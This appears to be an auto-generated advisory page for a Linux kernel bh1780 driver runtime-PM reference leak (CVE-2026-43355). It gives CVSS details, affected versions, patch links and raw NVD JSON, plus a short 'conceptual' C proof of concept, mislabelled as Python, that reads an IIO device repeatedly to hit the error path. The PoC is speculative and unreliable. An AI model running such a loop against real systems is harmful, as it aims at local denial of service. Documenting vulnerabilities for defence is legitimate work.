Security Vulnerability Report
中文
CVE-2026-43355 CVSS 5.5 MEDIUM

CVE-2026-43355

Published: 2026-05-08 15:16:46
Last Modified: 2026-05-15 16:02:10
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: iio: light: bh1780: fix PM runtime leak on error path Move pm_runtime_put_autosuspend() before the error check to ensure the PM runtime reference count is always decremented after pm_runtime_get_sync(), regardless of whether the read operation succeeds or fails.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (修复提交之前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-43355 (Conceptual) * This code attempts to trigger the error path in the bh1780 driver. * It assumes the attacker has local access and permission to read the device. */ #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #define DEVICE_PATH "/dev/iio:device0" // Example path, may vary int main() { int fd; char buffer[256]; ssize_t bytes_read; printf("[+] Attempting to open %s...\n", DEVICE_PATH); fd = open(DEVICE_PATH, O_RDONLY); if (fd < 0) { perror("[-] Failed to open device"); return 1; } printf("[+] Device opened. Triggering error path...\n"); // Loop to trigger the read operation repeatedly. // Depending on hardware state, reads might fail or hit the error path. for (int i = 0; i < 1000; i++) { bytes_read = read(fd, buffer, sizeof(buffer)); if (bytes_read < 0) { // Error encountered in driver logic. // Vulnerable driver skips pm_runtime_put_autosuspend here. printf("Iteration %d: Read failed (errno=%d), potential leak triggered.\n", i, errno); } } close(fd); printf("[+] Exploitation attempt finished.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43355", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:46.250", "lastModified": "2026-05-15T16:02:09.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: light: bh1780: fix PM runtime leak on error path\n\nMove pm_runtime_put_autosuspend() before the error check to ensure\nthe PM runtime reference count is always decremented after\npm_runtime_get_sync(), regardless of whether the read operation\nsucceeds or fails."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.7", "versionEndExcluding": "5.10.253", "matchCriteriaId": "ECAE2C71-1F96-4C4B-95AA-E231486990AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "6.1.167", "matchCriteriaId": "56D62904-7C85-4BED-9EC0-3982B880F72D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.18.19", "matchCriteriaId": "7FB5171C-B4B3-473D-BE87-E5F9956A42AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.9", "matchCriteriaId": "E825E7C3-FEAC-4FD3-8A81-78D7387948C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1eb3af4f59e09323788860a9155e9766b12891e5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/33661bfc85c14836bfef4425a74b0ca2df4bb5ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/424bf90e87134effe4bd932608a15286493b11ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aae572ddc28578af476cce7da3faec0395ef0bf0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dd72e6c3cdea05cad24e99710939086f7a113fb5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fc77e0a5600e620a2ae51ec78933162fb217b20b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.